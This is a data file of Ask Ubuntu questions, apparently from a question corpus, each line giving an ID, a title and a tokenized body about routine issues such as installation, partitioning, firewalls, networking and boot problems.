evolution address books ii libecal-1.2-15 3.6.4-0ubuntu1 amd64 client library for evolution calendars ii libedata-book-1.2-15 3.6.4-0ubuntu1 amd64 backend library for evolution address books ii libedata-cal-1.2-18 3.6.4-0ubuntu1 amd64 backend library for evolution calendars ii libedataserver-1.2-17 3.6.4-0ubuntu1 amd64 utility library for evolution data servers ii libedataserverui-3.0-4 3.6.4-0ubuntu1 amd64 gui utility library for evolution data servers ii libevolution 3.6.4-0ubuntu1 amd64 evolution libraries
326374	power failure during installation of ubuntu	i 'm installing ubuntu 13.04 from a pendrive to a windows xp desktop . after starting the installation few minutes later there was a power failure . all i could see now is a ubuntu screen with 5 dots on it . any help please ?
326376	ubuntu python error	it 's been months since i used my ubuntu pc . i updated and upgraded it yesterday but when i run help ( 'modules ' ) in python i encounter this i have n't tried using python before i updated my system so i 'm not sure if it is caused by the update .
326377	dual boot ubuntu for android on my galaxy note 2 ?	has ubuntu released `` ubuntu for android '' yet ? i read on their web page all about the product but no download link or install guide ? i have a galaxy note 2 and would really like to dual boot it and start trying it out ! ! http : //www.ubuntu.com/phone/ubuntu-for-android
326378	qt5 with qt 4.7 on ubuntu 13.04 . how to install it both without conflicts ?	i 'm using qt5 and need qt 4.7 now ( for embedded device ) . is it possible to install it additionally on ubuntu 13.04 ?
326381	recent keystrokes visible on shutdown	i am running ubuntu 12.10 and use the gnome 3 shell . the problem is the following : if i press esc during shutdown to show the shutdown messages instead of the splashscreen , sometimes it shows me all of the keystrokes i recently entered anywhere , be that website search forms , written mails , or sudo password prompts . i can not imagine that this is working as intended . i noticed this when i shut down my computer using ctrl+alt+del , after i experienced some screen tearing and the shutdown menu option was mysteriously missing ( so there definitely is something else ( at least at times ) wrong ) i am using the amd catalyst fglrx-legacy drivers provided by this repository , because my graphics card is no longer supported by the fglrx driver . i tried searching for people with a similar problem , but i ca n't for the life of me come up with a query that finds me anything useful . is this a known issue ? did i somehow install a keylogger from a 3rd party repo ? i will try to add a picture later today , but basically what you see on screen is a whatever i typed before , with a bunch of control characters thrown in ^ [ [ ... .
326383	in live ubuntu usb flash drive , can i have multiple casper-rw files , for additional persistence ?	i have a bootable live-usb flash drive with ubuntu installed on it , it has a casper-rw for persistence , but unfortunately , the casper-rw is almost full and the remaining space for storing data is running out , i ca n't delete more data , can i create another casper-rw on the same usb with a different name ( such as : casper-rw 2 ) and mount it instead of the original one ? ? and in case of that process is impossble , can i create another casper-rw file on another usb flash drive , or on hdd ? ? and how can i unmount the original casper-rw ( that has no additional space ) , and mount the new created one ? and in case of i could create two casper files on the same surface of usb drive , ( should they have different names or ( it is accepted to have the same name : casper-rw ) ? or should i change the name of each casper-rw file evrytime i would mount it ? ? ( by renaming it : casper-rw and give the unmounted casper another name temporarily ?
326385	how to install ubuntu 12.04 along with windows xp	i want to installing ubuntu 12.04 along windows xp and i have 80 gb hard disk and i have already partitioned it to 20 gb as c , 20 gb as d : drive , 20 gb as e drive and remaining as f : drive . i have already installed windows on c drive . so what would be the best course of action to install ubuntu in f : drive ? i saw the similar question that was asked earliers . but while installing i got an error like this - `` ubuntu experienced some internal error '' . how can i solve it .
326389	mount a partition with documents	i am still newbie to ubuntu . i have a partition ( ext4 ) with all my documents and photos , etc . this partition does n't have any mount point . i want to use document folder from this partition as my document folder in home directory . i see few possibilities , somehow to mount this partition on booting ( and not when i click on it in folder manager ) and create symbol link from my /home/documents to /media/partition/documents or just mount all partition as /home/document . it seems like the first solution is cleaner , however the problem is i do n't really understand how to mount partition on booting to constant media folder . what 's is the right way to do so ?
326391	after reinstall ubuntu 12.04 stuck after login screen ( not at login screen ) showing colourful screen ?	how i can fix stuck problem of ubuntu 12.04 after login i am able to boot windows successfully ? then what is problem in ubuntu ?
326392	only 3gb of ram with pae kernel on 12.04	i 've installed 4gb ram on my thinkpad x60 running ubuntu 12.04 . then i 've installed pae-enabled kernel . now uname -r outputs 3.2.0-50-generic-pae my cpu is capable of pae : $ grep pae /proc/cpuinfo flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon bts aperfmperf pni monitor vmx est tm2 xtpr pdcm dtherm flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon bts aperfmperf pni monitor vmx est tm2 xtpr pdcm dtherm bios reports 4096mb ram . yet free outputs total used free shared buffers cached mem : 3088452 2264192 824260 0 168056 852880 -/+ buffers/cache : 1243256 1845196 swap : 2085884 0 2085884 what 's wrong ? edit : here 's the e820 dmesg section : [ 0.000000 ] bios-e820 : 0000000000000000 - 000000000009f000 ( usable ) [ 0.000000 ] bios-e820 : 000000000009f000 - 00000000000a0000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000000d2000 - 00000000000d4000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000000dc000 - 0000000000100000 ( reserved ) [ 0.000000 ] bios-e820 : 0000000000100000 - 00000000bf6d0000 ( usable ) [ 0.000000 ] bios-e820 : 00000000bf6d0000 - 00000000bf6df000 ( acpi data ) [ 0.000000 ] bios-e820 : 00000000bf6df000 - 00000000bf700000 ( acpi nvs ) [ 0.000000 ] bios-e820 : 00000000bf700000 - 00000000c0000000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000f0000000 - 00000000f4000000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fec00000 - 00000000fec10000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fed00000 - 00000000fed00400 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fed14000 - 00000000fed1a000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fed1c000 - 00000000fed90000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fee00000 - 00000000fee01000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000ff800000 - 0000000100000000 ( reserved )
326397	verifiying ubuntu iso with repository gpg-keys	i want to verify that a downloaded iso is not being poisend by the nsa or any other immoral agent . to do this i would very much use a signing-checking way . i am aware of verifyisohowto . still i am not very happy with offered . if some agent can manipulate one file download he surely can manipulate all file downloads . so the public key i get from a key-server can just be cheated to make the manipulated iso file check okay , while indeed it has been injected a rootkit or worse . now i am aware of that there is unfortunatelly no 100 % sure way . but starting with the assumption that my current system is safe i have those keys used in the secureapt mechanism . my question therefore : how can the keys that i already trust in secureapt ( = the ordinary ubuntu repository keys ) be used to verify a freshly downloaded iso ? indeed it would serve me well also if i could via the ubuntu repo ( and hence in a deb that is verified implicitly via secureapt ) get those public keys which would be necessary to verify the signature of the iso . any help would be greatly appreciated . ps : of course i am aware that if canonical is immoral and colaborates with nsa ( which has money hey ) we are all poisend anyhow . let 's just assume something like this could never happen , ok ?
326400	software similar to acrobat reader	is there a software on ubuntu in which we have options like highlighting , underlining , marking text of a pdf document , like in adobe acrobat ?
326401	owner , xattr on encrypted remote backup	i am trying to configure an encrypted remote backup . my approach is to backup my data to a local drive which is encrypted using ecryptfs ( mounted with mount -t ecryptfs /lower_folder /upper_folder ) with rdiff-backup , then copying the all encrypted files to another server . during my test , i noticed that the files in the upper folder of the encrypted drive have the correct permissions and xattr . when i looked at the permissions in the lower folder , they were all set to root ( which may not be an issue ) . then , i transfered all files to another server using rsync -ahax to minimize the amount of data to be copied . for the test 's sake , i transferred back the files to anoher folder of my first system , and mounted them . the ownerships were quite different . how could i do remote backup while preserving safely ownership and xattrs ? i appreciated ecryptfs because of the flexibility . another approach would have been to use truecrypt container , but i saw that only ntfs containers can be expandable . i also saw about dm-crypt + luks mounted in a file ( with losetup etc . ) , but does rsync perform well wih such a container , minimizing the data to be transferred ? the last solution for me would be to run a script that collect the owner and xattr status for all files , but before doing it , i wanted to make sure that there is not another cleaner solution . thanks for your help
326409	changes to keyboard layout resetted on restart	i edited /usr/share/x11/xkb/symbols/fr to customize the french-dvorak layout . i then selected french-dvorak layout ( instead of french ) . now when i restart ubuntu , i end up with the non-edited french-dvorak ( my changes are ignored ) . but if i switch to french , then back to french-dvorak , my changes are now taken into account ... how can i have my custom french-dvorak on startup ? is there some sort of cached version of the keyboard layout ? i do n't understand how it can switch me to the official french-dvorak because i changed it , so it should no longer exist .
326411	how to get wmctrl output in python	how can i get the output of the terminal code `` wmctrl -m '' $ wmctrl -m name : gnome shell class : n/a pid : n/a window manager 's `` showing the desktop '' mode : on in python code ? i do n't know how to invoke that command in a skript . the purpose is , i want to get the value of mode : on or mode : off . right now i only imported wmctrl import wmctrl and then ?
326419	technisat does not provide linuxdriver	my -technisat sky star 2- tvcard needs linuxdrivers wich are not provided by technisat . what can i do ? i am a 74 old linuxbeginner , until recently windowsuser und would be glad to find a solution for nonexperts like me and help to get away from windows . thanks robert
326421	mongodb service does n't restart after being stopped	currently i am unable to start mongodb with the usual command sudo service mongodb start . when i do that , i get something like : mongodb start/running , process 23387 however no such process is subsequently running , and the mongodb log does n't show anything new . mongodb does however start on reboot , and it can be stopped with sudo service mongodb stop . it 's more of an inconvenience than a game stopper , but i 'm intrigued - what 's going on ? ?
326425	do n't show a running application in the launcher ( pyqt4 )	i write an application that has an icon in the upper right corner in the notification area , so there is no need to put its icon in the launcher . but it is automatically put there . how do i disable that ( in code , not x ) ? i write this in python with qt , pyqt4 .
326428	what happened to ubuntu certified professional ?	i would like to study and get some sort of qualification behind my name . i see there is a linux professional institute exam - but what happened to the ubuntu version ? how do i prove my knowledge of specifically ubuntu at a job interview for example ?
326432	how long does it take for a proprietary software to get reviewed to ubuntu	my application is just a .py file that has a gui . i tarred it and uploaded it to myapps under proprietary license ( $ 0.0 ) as i have no idea about packaging . the source code is available at github . it is actually open source and link to the source code would be in the about menu of the app . i want to know how long should it take to get reviewed .
326433	dash wo n't show up / brings up a blank window . also glitchy screen	i am new to ubuntu so be easy on me . i have recently installed ubuntu desktop 13.04 on a 5 year old desktop and everything works fine , except the dash button . when i click on the dash button it just blanks out everything behind it and the dash doesnât show up . i am wondering if there is a fix for this . i want to search for my applications and such but i can not get the dash to show up . i also have one more problem . the top half of my screen is glitchy and is really annoying . it kind of flickers , and i am wondering if this is just a refresh rate problem or what , but i can not get it to stop .
326437	keyboard is not working at all	recently installed xfce4 on my ubuntu 12.04 system , when i rebooted the system the keeyboard and mouse are not working . the keyboard works till i select the boot options from grub after that keyboard and mouse are not working . what do i do now ?
326440	after booting to ubuntu always shows such error dialogs , how to disable all error prompts like this ?	i am using openbox and after boot it always keep showing error dialog boxes how to ignore and disable those error dialog boxes completely ? i have tried following but still it did not disabled . vim /etc/grub.d/00_header set timeout=0 vim /etc/grub.d/10_linux set linux_gfx_mode=keep
326441	how to add a user to ubuntu 12.04	this is very weird , when add a user using the command line then set a password i cant login using the gui ! is this a new thing or what ?
326446	why i am not able to run internet explore oriented sites on ubuntu ?	i am ubuntu user from 2 months and actually i want to visit the bulhorn.com website and this bullhorn.com portal is only suitable with internet explorer . in order to visit bullhorn.com site i have installed playonlinux tool to install ie 8 on my ubuntu system . but ie 8 is not so good.it takes 15 mins to open any site . i have searched lots on google but i am not getting that how i can use ie oriented sites on my ubuntu . please suggest me efficient way to visit ie oriented websites on ubuntu .
326449	is there a standard installation location for scripts ?	i 'm deploying a bunch of python scripts to my build , test and soon production server . it can be nodejs or any other thing i want to run under nginx so the location should be generic rather than specific to the type of script . the files deployed are coming from the the build server artifacts and all versions ( build , test and maybe also production ) should reside on the same server so using a default folder is not an option as the builds would overwrite each other . the intention is to keep a complete installation contained in one folder per build no matter what type of script it is . folder could look something like this : /usr /local /build /www /python /nodejs /test /www /python /nodejs is there a preferred location on linux where the root of each build installation should reside ? i have seen /usr/local mentioned but am not sure it is the one to use .
326452	gnome 3 classic on ubuntu 12.04 : how to get application shortcuts	since several weeks i left unity for what it was , installed gnome 3 , and have been using the classic option . back in the days of gnome2 i had a bunch of shortcuts in the top menu bar , for all the apps that i opened daily , like firefox , the terminal , eclipse etc . now i see `` applications '' and `` places '' , then nothing , then the tray icons for mail , connection , date/time etc . although i can open any application with the applications menu , i would like to have those shortcuts back . is that possible and if so how ?
326460	how to change permission of /root/opt while it is owned by root	i want to change the permission of the folder `` opt '' and `` usr '' . it is owned by root . i ca n't change the permissions at this moment because it 's showing `` you 're not the owner , so you can not change the permission '' . i want to change permission of inside folders too . is there any command for that please ? i 'm a newbie to ubuntu and currently having 13.04
326461	problem with static ip in ubuntu 12.04 lts server	i change my server 's ip from dynamic to static . after i change the file in /etc/network/interfaces with the following code , my server lost connection to internet . here 's my new network interfaces : auto eth0 iface eth0 inet static address 192.168.254.120 netmask 255.255.255.0 network 192.168.254.0 broadcast 192.168.254.255 gateway 192.168.254.1 so after , i restart the networking service my ip in ifconfig change to 192.168.254.120 but when i try to ping any site or my other pc , it doesnt work . i will put here my original ifconfig info just in case someone will ask . ifconfig eth0 inet addr : 192.168.254.109 bcast : 192.168.254.255 mask : 255.255.255 i hope someone can help me change my server to static ip . thanks .
326465	high cpu load all the time	simply , my pc is crap , it has pentium 4 3ghz 2mb cache cpu with intel graphics g31/g33 and 1gb ram on normal work , such as using firefox , the cpu use is more than 50 % , and if i opened more than 5 tabs , it might lag because of the cpu is this normal ? its quite annoying
326466	php , ssh2_exec is not working properly	i have a shell script makedir.sh as given below . sudo -h sh -c ' mkdir /usr/local/testdir ; if [ $ ? -eq 0 ] ; then echo `` successfull '' ; else echo `` unsuccessfull '' ; fi ' i have given privileges to a user testuser to execute shell script with sudo , but without asking password.for this i add the below line in /etc/sudoers file , testuser all= ( all ) nopasswd : all and it works fine that , i could run commands with sudo , but without asking password . the above shell script also working fine without asking password , creating directory testdir inside /usr/local . my problem starts here . i want to run this shell script from a php file . in the current scenario the shell script is residing in a remote machine with ip address 10.3.2.0 . the following is my php code but , while running this php code , it is not creating any directory ( testdir ) inside /usr/local/ . please advise as i am very beginner in php . php code < ? php if ( ! function_exists ( `` ssh2_connect '' ) ) die ( `` function ssh2_connect does n't exist '' ) ; if ( ! ( $ con = ssh2_connect ( `` 10.3.2.0 '' , `` 22 '' ) ) ) { echo `` fail : unable to establish connection '' ; } else { if ( ! ssh2_auth_password ( $ con , `` testuser '' , `` abcdef '' ) ) { echo `` fail : unable to authenticate `` ; } else { $ stream = ssh2_exec ( $ con , `` ./makedir.sh '' ) ; stream_set_blocking ( $ stream , true ) ; $ item = `` '' ; while ( $ input = fread ( $ stream,4096 ) ) { $ item .= $ input ; } echo $ item ; } } ? > shell script - makedir.sh ( residing at 10.3.2.0 - the same above shell script ) # ! /bin/sh sudo -h sh -c ' mkdir /usr/local/testdir ; if [ $ ? -eq 0 ] ; then echo `` successfull '' ; else echo `` unsuccessfull '' ; fi ' thanks .
326467	what is the source code to tell grub customizer to list usb as a startup disk ?	i am running 11.10 on an older macmini . trying to install 13.04 . i made a new ubuntu 13.04 startup disk on a usb drive , but can not get ubuntu to startup from that drive . i found no way in 11.10 to set the startup disk . pressing f12 during startup does n't work , as this is a mac . it has no dvd burner , so i can not make a dvd startup disk . and 13.04 is too large to burn to a cd . i installed grub customizer . made predefined startup types visible at startup , but usb drive is not among them . with grub customizer you can apparently make a new predefined item show at startup , but i do n't know the source code to enter to make the usb stick show up as a startup disk . the usb device is /dev/sdb the mount point is file : ///media/a6de-37da
326471	linux multimedia studio	during ubuntu installation , made the computer location france . however , i need english as the lmms language . there is no language choice within the program . there is no solution at the developer website . how can i download an english version ?
326482	can not boot ubuntu from ssd in asus k55vd	as the title would suggest , i am having trouble booting from my new ssd that i installed in my asus r500v k55vd today . i have been running ubuntu on the hdd since i got the laptop , but i wanted to upgrade to an ssd . i installed the ssd in a caddy that slots in to where the dvd drive was . when entering the bios i can see that sata is in ahci mode and that my ssd and hdd are both being discovered , however i can not see a boot option for the ssd ; only the hdd has an option . i can not see a way to add my ssd to the boot list . booting in to the ubuntu 13.04 live usb i can see that the os installed itself on my ssd , but i simply can not get the bios to boot from it . has anyone else had any problems using two storage devices on this laptop that can shed any light on this ? i also tried using the suggestions in this question , but i still end up at the grub rescue prompt : ( i have the following layout : hdd ( sda ) : 512mb /boot rest /media/data ssd ( sdb ) : all / i have tried installing the bootloader in the /boot partition and just directly in sda with no observable difference .
326484	boot without full network configuration	at every boot i got this message : '' booting system without full network configuration '' . this is my /etc/network/interfaces file : auto eth0 iface eth0 inet manual up ifconfig $ iface 0.0.0.0 up up ip link set $ iface promisc on down ip link set $ iface promisc off down ifconfig $ iface down auto eth0:1 iface eth0:1 inet static address 10.10.100.51 netmask 255.255.255.0 auto br-ex iface br-ex inet static address 192.168.1.167 netmask 255.255.255.0 gateway 192.168.1.1 dns-nameservers 8.8.8.8 where br-ex is a bridge connected to the internet and eth0:1 is a non-existent network needed for openstack ! how can i solve the slow boot problem caused by the network not being configured ? ( but when booted it is all ok )
326485	how to configure a firewall that only allows a few webpages and dropbox and u1 services ?	can anyone give a step-by-step how-to that explains how to block all outgoing internet traffic to all websites , but allows only a selected list ( needed for working , fi . online dictionaries ) allows dropbox and ubuntu one to do their job ( so backups will not be lost and things get synced ) that can be switched off easily after a period of hard work i have no knowledge whatsoever of networking , about hosts , ips , subnets , subnetmasks , ports , ipconfig or whatever . in the past i always used firestarter to block all my outgoing traffic apart from a few webpages . firestarter does not do the trick anymore . if i add an outgoing whitelist the policies just do n't apply . with gufw i ca n't work because it is overtly complicated . the use case : i need to stay focused on my work and thus i need easy access to the internet to be less easy . thanks in advance on behalf of all networking noobs . edit/update on why gufw is hard to use what is hard to understand on gufw is how to define policies . in the add rules dialogue i do not understand in the simple tab , whether i should choose tcp or udp or both . whether i should choose a port or a service , what the dangers are of this and how to find the name of this port or service in the advanced tab , whether i should choose tcp or udp or both and what the values of the from and to fields should be ( especially the port number ) . also why should i specify a from field ? that 's localhost right ?
326487	why ufw is blocking my outgoing traffic ?	here is my status : $ sudo ufw status verbose status : active logging : on ( medium ) default : deny ( incoming ) , allow ( outgoing ) new profiles : skip to action from -- -- -- -- -- -- 22 allow in anywhere all outgoing flow are allowed . now when i am doing : $ wget www.google.com -- 2013-07-30 14:28:00 -- http : //www.google.com/ resolving www.google.com ... failed : name or service not known . wget : unable to resolve host address `www.google.com' what i see in /var/log/kern.log is that the traffic is , indeed , blocked : jul 30 14:11:27 xxxxxx kernel : [ 2207680.256415 ] [ ufw block ] in=lo out= mac=xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx src=127.0.0.1 dst=127.0.0.1 len=60 tos=0x00 prec=0x00 ttl=64 id=62240 df proto=udp spt=35323 dpt=53 len=40 here is my ufw version : $ sudo ufw version ufw 0.29.3-1 copyright 2008-2009 canonical ltd. is explicitly allowing outgoing traffic not enough ? how to solve that ? should i add a rule for allowing the loopback interface ? how to do that ?
326489	ajenti vs webmin . what is the best for my ubuntu 13.04 server	hi recently i setup ubuntu server 13.04 in vmware workstation . then i install lamp . now i want to install any control panel . so i ca n't decide which one will favour me . ajenti or webmin ? i do n't use any control panel before . also i want to know that i already installed lamp ( apache + php + mysql ) . so extra what can i do with admin panel management tool like ajenti or webmin ?
326490	xbox controller wo n't work with dishonered pc game ( played through steam and wine )	i installed the windows version of steam in my ubuntu 13.04 os because of older pc games i have . everything works fine except when i play dishonered , it wo n't detect my xbox controller . i have tried installing xpad/xboxdrv but it still wo n't work . i could technically use qjoypad , but qjoypad for me is buggy . would rather prefer my controller communicate directly with the game rather than a third party software . i know ubuntu can detect my controller cause it lists it when i type in lsusb in the terminal . any suggestions on what i could do to have my xbox controller running in the windows version of steam ?
326492	unable to install matlab 2008	i am unable to install matlab 2008 in ubuntu . i am getting the following error when i have typed ./install in terminal window . bash : ./install : permission denied and when i typed sudo ./install i am getting the error as sudo : ./install : command not found please assist me in installing matlab 2008 .
326494	how write *.sh to mv and run files	i have two config.yml files but do n't want to use cron or type them manually . i want to name them file1.bak and file2.bak . when i 'm in the mood to run them i want to type something like ./call.sh or ./call2.sh the script will automatically have root privelege and change file1.bak to config.yml and run it . then it will change it back to file1.bak . i want no permanent config.yml because i use two or three separate files depending on what i want them to do . would appreciate any help . for reference this is a config.yml file for flexget . i should combine everything but i like separate files to find errors easier . ray
326495	nexus 4 - failed to install ubuntu touch	i have followed the steps on the ubuntu website as it says , and it gets stuck halfway through 'phablet-flash -b ' . what makes it worse i then when i try to put it into recovery , and run the code 'adb devices ' it does n't show any devices ? any help please ?
326496	ubuntu 13.04 extremely slow on my desktop	i have installed ubuntu 13.04 on my desktop computer without doing any partition , and no any dual boot operating system . my desktop hardware components are given below : hard disk 500gb ram 2gb processor core 2 duo 2.20ghz it is running too much slow , even web browser also hang sometimes and i faced also less memory error . when i saw memory information using free -m command total used free shared buffers cached mem : 1968 1737 231 0 75 880 -/+ buffers/cache : 781 1187 swap : 2011 0 2011 even a small application consumed more memory .
326498	what is the difference if i ve installed kernel ubuntu current version or kernel 3.10.4	my current kernel version on ubuntu 13.04 is 3.8.27 but the latest kernel version is 3.10.4 , is appropiate that i change to the newest kernel version 3.10.4 ? , i ll have benefits , troubles or nothing with this change . i read about some vulnerabilities about kernels versions 3.8 that i think that were corrected . i know that the newest kernel version 3.10 have more support about somethings like ssd . why ubuntu ( and another distros ) do n't use the newest kernels versions ? some experienced programmer can change something in the original kernel and put unwanted code by anyone ? i have no problems now with my kernel 3.8.27 on ubuntu , i just want read and learn about this . thank you
326513	ubuntu 13.04 installation problem : no full installation button in `` try ubuntu ''	i already clicked `` try ubuntu '' on ubuntu 13.04 because there 's no full installation button . i dont know why ? but after restart , it 's just skipped to windows boot . what should i do ?
326515	restart installer on any error ( pxe with cobbler )	i provision few boxes using pxe with cobbler . my network is not very stable , so sometimes the installation fails . the installer is not able to retrieve a package . is it possible to make the installer to reboot on any error ? i do n't want to waste time and go to the machine , connect a keyboard just to press enter . i want my machines to keep rebooting till they are installed .
326518	how to expnad size of root partition , and using swap partition	my computer have 500 gb hard drive , and partition table as following 367 mb - windows 8 loader 104 gb - windows 8 332 gb - personal stuff 64 gb - extended from above partition previously it was ~400 gb . 5 gb - ext4 for ubuntu 4.1 gb - swap partition ( above 2 partition , 5gb and 4.1gb were automatically created when i install ubuntu , i choose the option `` side-by-side windows 8 '' ( or something like that ) when i installed ubuntu . 55 gb - again personal stuff now i 'm running with low space problem , and i want to merge the partition 7 and partition 5 to partition 6 , how can i do that
326523	ubuntu 13.04 installation on lenovo u410 dual boot with windows 8	i 've just bought an lenovo u410 and want to dual boot ubuntu 13.04 ( or the lts , not that worried ) and the included windows 8 . i 've seen that previously the ssd cache/raid arrangement of the u410 causes problems for dual booting , but all the threads i 've seen are about win7 and 12.10 . my question is is there any difference in trying to work with 13.04 and windows 8 ? and does anyone have a step-by-step for how to do this ( a verbose one because it 's a while since i 've installed ubuntu on anything ! ) . many thanks marcus .
326526	how to mount windows partition in ubuntu 12.10	i have ubuntu 12.10 live cd , when i run this in disks it shows only one entry of my whole drive ( 500gb ) . it 's not showing my windows partitions ? how get all those partitions and mount them ?
326528	how to boot to the recovery mode if it is not listed in grub ?	i want to boot ubuntu into recovery mode but there is no grub menu entry allowing me to do so . i pressed e and now i am able to edit boot options . it looks like that : setparams 'ubuntu , with linux 3.6.0-26-generic' recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root < uuid > linux /boot/vmlinuz-3.5.0-26-generic root= < uuid > ro ipv6.disable=1 quirt splash $ vt_handoff initrd /boot/initrd.img-3.5.0-26-generic the menu editing examples documentation says : boot to the recovery mode even if it is not listed on the menu : remove existing kernel options from the linux line and add single but this sentence does n't make any sense , maybe the wiki page is broken somehow . how to modify the boot menu to boot directly into recovery mode ? note : i do n't have access to grub config or anything else , only the boot menu edit page is available .
326529	ubuntu 12.10 : unble to install smbfs	i am trying to install smbfs on my ubuntu 12.10 , and face the following problem . i have tried uninstalling and resinstalling samba , still same errors . $ sudo apt-get install smbfs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : smbfs : depends : samba-common ( = 2:3.4.7~dfsg-1ubuntu3 ) but 2:3.6.6-3ubuntu5 is to be installed e : unable to correct problems , you have held broken packages . please help .
326532	how to fix the mbr for windows 7 ?	i have installed ubuntu as dualboot with windows 7 . now i 'm no longer using ubuntu so i removed the ubuntu partition and added the unallocated space to my windows 7 partition . but after i restart my computer it goes directly to the error : error : unknown filesystem grub rescue > i do n't have the original windows cd to fix the mbr . is there a way to fix this error without using the windows cd ?
326533	usb 3.0 not working on ubuntu 13.04	i 've spent a lot of time trying to figure out why my usb 3.0 does n't work on ubuntu 13.04 , but i was not able to find the answer . so i have decided to post this question here now . the port on my vaio t ultrabook is definitely getting power , but no device is recognized when i plug it in . uname -a 3.8.0-25-generic # 37-ubuntu smp thu jun 6 20:47:07 utc 2013 x86_64 x86_64 x86_64 gnu/linux lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 008 : id 046d : c05b logitech , inc. m-u0004 810-001317 [ b110 optical usb mouse ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 005 : id 0489 : e036 foxconn / hon hai bus 001 device 004 : id 05ca:18c4 ricoh co. , ltd i could post any other outputs here if needed . i appreciate your help !
326536	what software could i use to do video surveillance ?	i 'm trying to set up a video surveillance system at home . is there a software system out there that is easy enough for a beginner/basic user of 12.04 to set up and use ? i 've been attempting to set up zoneminder for a week and still can not get the first image from even my webcam .
326537	upgrade from lubuntu 12.10 to ubuntu 13.04	i have downloaded `` ubuntu 13.04_raring ringtail_release i386 '' , but it comes with two files : the first is iso , the second iso.part . i use xfburn to make the iso file in the disk , and it ca n't recognize the second file `` part.iso '' . is somewhere available `` ubuntu 13.04_raring ringtail_release i386 '' in an only file iso to download ? thanks
326538	static ip in ubuntu 13.04	i am trying to set my static ip address in ubuntu 13.04 . all the tutorials say to navigate to /etc/network/interfaces and change the line that starts with eth0 . when i navigate to the same file , eth0 is missing and appears to be replaced by lo . i am using a wireless connection if that helps .
326549	my /home partition became full after moving files from encrypted user folder to unencrypted user folder . what can i do ?	i 'm currently working on removing my home directory encryption by following the instructions given by ecryptfs-setup-private -- undo . i have exited the graphical session and logged in on a tty in order to move all files from ~ to a temporary location ( on the same partition as /home ) and thus from /home i issued the following command : find ~ -maxdepth 1 -mindepth 1 -not -name .private -and -not -name .ecryptfs -exec mv ' { } ' -t zoopp.unencrypted \ ; . the command moved about 30 % of the files and then it stopped due to insufficient space . when i checked the output of 'df -h ' i noticed that the home partition is full . before starting the move operation i had about 70gb of free space and since as far as i 'm aware ecryptfs does not compress files i thought everything will be alright . what can i do in this situation ?
326552	repartitioned , but stil out of space on vmware ubuntu 13.04 64 bit	i am running ubuntu 13.04 64 bit on vmware 5.0.2 . i am having disk space issues despite growing the linux partition from 30gb to 300gb . the process i used to increase the size of the disk was to first allocate additional disk space in vmware , then boot to the gparted live cd and allocate that extra space to /dev/sda1 . an output from df -h shows the following : filesystem size used avail use % mounted on /dev/sda1 295g 280g 6.2m 100 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 2.0g 8.0k 2.0g 1 % /dev tmpfs 395m 396k 395m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 848k 2.0g 1 % /run/shm none 100m 32k 100m 1 % /run/user usinge disk usage analyzer ( gksudo baobab ) , i see that my home folder is using 100 % of space . this equals 292.0 gb . however , no folder within my home folder comes close to adding up to 292 gb . i have also tried rebooting to the gparted live cd and running the `` check '' command to fix any errors . however , the space results are the same . any ideas what needs to be changed here in order for ubuntu to correctly recognize the free space ? thanks !
326556	i ca n't start a new project on netbeans	the issue : when i open the `` add new project '' dialog ( screenshot below ) , i ca n't create a new project . the loading message ( hourglass icon ) stays on forever . except for `` cancel '' , the other buttons are disabled . it was working fine a few days ago , i have n't changed any setting prior to the issue appearing . i ran the internal update feature , but the issue persists . the info : my os version : ubuntu 12.04.2 lts 64 bits netbeans version : help - > about product version : netbeans ide 7.2.1 ( build 201210100934 ) java : 1.6.0_27 ; openjdk 64-bit server vm 20.0-b12 system : linux version 3.2.0-49-generic running on amd64 ; utf-8 ; pt_br ( nb ) user directory : /home/user/.netbeans/7.2.1 cache directory : /home/user/.cache/netbeans/7.2.1 what i tried : changing the look and feel with the -- laf command-line option . the look-and-feel does change , but the issue persists . using the internal update command , a plugin got updated but the issue persists . downloading and installing the latest version ( 7.31 ) , it imported the settings from the previous version and the issue persists . removing the settings folder ~/.netbeans/7.3.1 , restarting netbeans , choosing not to import settings and rather have a new clean install
326558	how do i get thunderbird to always show embedded images ?	i 'm tired of clicking `` show images '' for nearly every email . is there an option or addon i can use ?
326562	unity webapps icons names	so , as you know unity has those unity webapps which is basically a service that allow certain websites to integrate with the unity desktop . youtube integrates with the sound menu , reddit with the messaging menu , etc ... when you install a certain webapp it creates an app for itself in the unity dash and needless to say this app has an icon . as i happen to be part of a team that is creating an icon theme i want the theme to have consistency everywhere and that means covering those webapps icons too . however i have no clue where the webapp icons names are or where they should go in the icon theme . does anyone know ?
